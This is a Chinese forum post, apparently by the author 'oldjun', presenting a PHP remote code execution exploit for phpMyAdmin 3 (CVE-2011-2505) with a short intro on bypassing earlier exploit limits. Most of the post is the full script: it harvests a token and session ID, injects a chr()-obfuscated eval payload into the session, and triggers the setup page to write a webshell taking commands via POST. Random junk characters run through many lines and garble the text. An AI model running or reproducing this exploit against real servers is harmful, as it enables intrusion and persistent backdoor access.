最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。. T, h+ R6 X9 D" o% J" t9 P3 s
8 w" A, n0 q. M( ~$ K( A$ N
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
: }" Q3 w" U8 |! y( ]8 Y8 D
! c9 K9 M( |+ y4 l6 ~1 }! v2 K首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
" O. \7 I, H1 h/ ~) t一是session.auto_start = 1; [! j8 ?/ Z6 z8 a$ r" l; J
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。5 y, E3 \! o5 y3 w. e" P$ ^# |
当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。 w5 A# i/ b! S
" Q; ~3 x& C" U+ b! x) N, |' u' W
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
' Y( A# ?; P" ^ L: s+ j) C' J8 Y% s1 Z, t
于是写了这个php版本的exp,代码如下:
4 C4 N8 N( c2 G: f. J$ Q4 [: e# ~$ J( @( b9 z
#!/usr/bin/php
4 O! |; a8 t$ K+ J% T<?php
3 B1 a5 ?# t+ t# J! b% m: c Fprint_r('% T5 s2 `3 ?: d1 u k) m* |" |
+---------------------------------------------------------------------------+
$ k2 J! E/ r. l+ C. I- Qpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
. P9 E9 f9 O9 o: k: f& z/ {6 Jby oldjun(www.oldjun.com)
5 e& Y4 L/ J# k3 ]$ U7 _welcome to www.t00ls.net
# ]3 `0 K' i5 X$ S9 y: Vmail: oldjun@gmail.com
2 [; }$ M3 `( }; k' SAssigned CVE id: CVE-2011-2505
& }# h% |. ?( V+ Y* L6 U7 H+---------------------------------------------------------------------------+
5 U# U7 o& _# O: R# ~');% y2 ~/ M: U6 Z6 E
, U( ?' ~, r e. m$ d: d; D' Z/**) k2 ~4 p8 n' j0 b4 b
* working when the directory:"config" exists and is writeable.! D6 s0 C; Z6 l" w9 N
**/
6 H0 c7 i* U: r6 ?! p" w 4 [+ [# a g" h* {) ]7 R( f
if ($argc < 3) {" y& L: C* C1 m- b% ^. B
print_r('& b% u5 h7 J) w3 d, _0 Q
+---------------------------------------------------------------------------+; y8 x9 D4 }1 K: D4 |" D/ c' @
Usage: php '.$argv[0].' host path
1 \" S% D4 S( Y% G. ?% phost: target server (ip/hostname)' K0 W b" M; P9 k% k
path: path to pma3
1 B) N$ J- k3 I7 b5 R* X7 kExample:
+ u* a/ ^+ q3 K- U7 ?php '.$argv[0].' localhost /pma/
# M+ h6 @1 S* t+---------------------------------------------------------------------------+
/ z4 ]# D, S' P9 R. i');/ j: G$ i1 ~, t. @
exit;9 F( D& U$ L" m M
}
! u( ]# \7 I+ {0 Y0 @. ?" r5 h( W( C! p6 J- U* p) a. j7 I2 f
$host = $argv[1];* G9 |- q* C3 D3 N% T: x4 l. F
$path = $argv[2];/ E3 _ }" w- @. ~( [1 R
5 a5 p3 X' o6 s* F. a# c$ S7 D/**
" I% Y/ L/ D& P2 A1 { * Try to determine if the directory:"config" exists9 U' b& {; Z) \& M5 ?
**/
2 Z$ B& g7 \; } \% [echo "[+] Try to determine if the directory:config exists....\n";
) L0 u' E. h8 B$returnstr=php_request('config/');
( {9 N3 H0 M; }; e7 h: Zif(strpos($returnstr,'404')){/ X4 l9 k" d- u9 Q+ s6 R; [. Y3 r+ J& X
exit("[-] Exploit Failed! The directory:config do not exists!\n");
; q# _" T+ c% P6 d8 P}
2 j- C. U1 L$ H7 n( z
/ I; Y3 N4 I' _( C/**. ~ t/ G" F) ]) a7 C6 z2 @
* Try to get token and sessionid
- _7 r$ g+ C1 g- o8 m5 e**/
9 i6 t; e9 N2 Z9 W+ Y& xecho "[+] Try to get token and sessionid....\n";
# }2 J/ x' f" {+ S1 C) U; ~' `$result=php_request('index.php');
( X) p0 @) h# m0 k8 V7 zpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);8 W5 Y- T0 b- V/ g
$token=$resp[3];1 J9 o" R" A; L0 x' m) g$ I
$sessionid=$resp[1];
+ A: ?+ D6 D8 W$ U8 P/ a: oif($token && $sessionid){/ q6 |7 `) A7 f, o
echo "[+] token token\n";7 w s* P3 j3 [. U" w* g) F4 t
echo "[+] Session IDsessionid\n";) z+ C _+ {9 M) T# I
}else{) t0 g% L+ \' C( L
exit("[-] Can't get token and Session ID,Exploit Failed!\n");" \9 w6 Y$ M/ h2 Z+ O/ [* j/ `
}) L: D2 h" @& S( {
# X1 T5 o9 i5 r- j" Q. P1 Z. X/**6 p1 q. a( B9 M" |7 | _1 F
* Try to insert shell into session7 t5 b( v" Q* z& q/ \* H& u
**/
3 ?/ ?" S, o+ X! j$ g: Hecho "[+] Try to insert shell into session....\n";
. i4 e8 Z, C$ J: g- qphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
; _! f# ^& L* g$ c
* k, x5 O: \6 r2 B% a* \7 e/**8 C- v% @7 V! J% l- @. n# E4 F) ^
* Try to create webshell
; _* C: p0 x2 r; b, [) U c3 P0 e**/
: f4 _' G' X4 Z3 w+ w8 decho "[+] Try to create webshell....\n";9 q7 J0 _7 Y5 i! e( K) y
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);) t, Z6 F1 j# M9 e. D) G0 e
/**6 I/ I, Q. u; v9 G4 ]" [
* Try to check if the webshell was created successfully
g) P" B- [; w! J/ q! J6 b**/
$ z' u. t" p4 [5 H: qecho "[+] Try to check if the webshell was created successfully....\n";* u8 x7 M( N# p$ _" F! V
$content=php_request('config/config.inc.php');3 F2 s4 P1 E. ~! S9 c0 Q! L Y
if(strpos($content,'t00ls')){' w0 r" K7 r7 C8 t/ h
echo "[+] Congratulations! Expoilt successfully....\n";9 Y) }! B+ q; k
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
3 z7 A" A1 m4 O}else{
7 h3 t+ d, j8 J6 m N8 Y6 a exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
/ ?4 H( c( G* l) F- W3 @0 O0 A. B}" ^, r# g" q: }9 ?5 m
& c4 y" r/ Q1 ~; ~1 bfunction php_request($url,$data='',$cookie=''){, X8 [- G2 y9 ?0 b% b1 A
global $host, $path;) O3 A# z9 a- Q6 w8 Y+ i
: {; p8 `3 s1 F! Q6 I
$method=$data?'POST':'GET';" n6 t* M% M9 T; e* V% i- d
: z6 Z D P) z+ a- k+ R" K $packet = $method." ".$path.$url." HTTP/1.1\r\n";
! V+ \" v* ^/ P1 ` $packet .= "Accept: */*\r\n";" }0 p- ~. W, t2 d. q) T1 j
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
- L% A( c3 d9 W0 ]& h# g' E $packet .= "Host: $host\r\n";
1 E, @2 [% x) K8 v, j $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";( N. F5 ` l. C+ Y6 ]( f) ~
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";$ B. G: \; z. W+ P7 X
$packet .= $cookie?"Cookie: $cookie\r\n":"";3 X6 R) u; M1 U# O
$packet .= "Connection: Close\r\n\r\n";* t3 { l S, k8 \* d
$packet .= $data?$data:"";4 K5 v, g. x& m
. q/ s, L3 N8 S) }- f+ K $fp = fsockopen(gethostbyname($host), 80);2 n1 r$ R- S: R0 `5 h7 U, _
if (!$fp) {" k7 l% {) ]3 V, Z* f2 t
echo 'No response from '.$host; die;
* r0 v: q2 e& s& G5 r }7 i8 \3 F9 N# d4 p3 i! g9 A
fputs($fp, $packet);: |$ O6 I/ w2 F3 ]8 o9 B" s. e
3 m) y" @2 {1 y6 G $resp = '';
) s4 r9 d. Y" J) K
8 e$ D+ l3 w* N7 Z" { while ($fp && !feof($fp))5 E6 ^# }5 @, w1 @/ R' B/ Q q5 _7 C
$resp .= fread($fp, 1024);0 h( C) m, C2 b! o# Y
- C4 b" h; P [! O return $resp;
0 \ V. z6 M' i5 W& D+ V}) A* |4 H9 t8 Y
- l+ o A) D$ b" O! o?> 2 t8 n, s2 B! p4 H* O
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对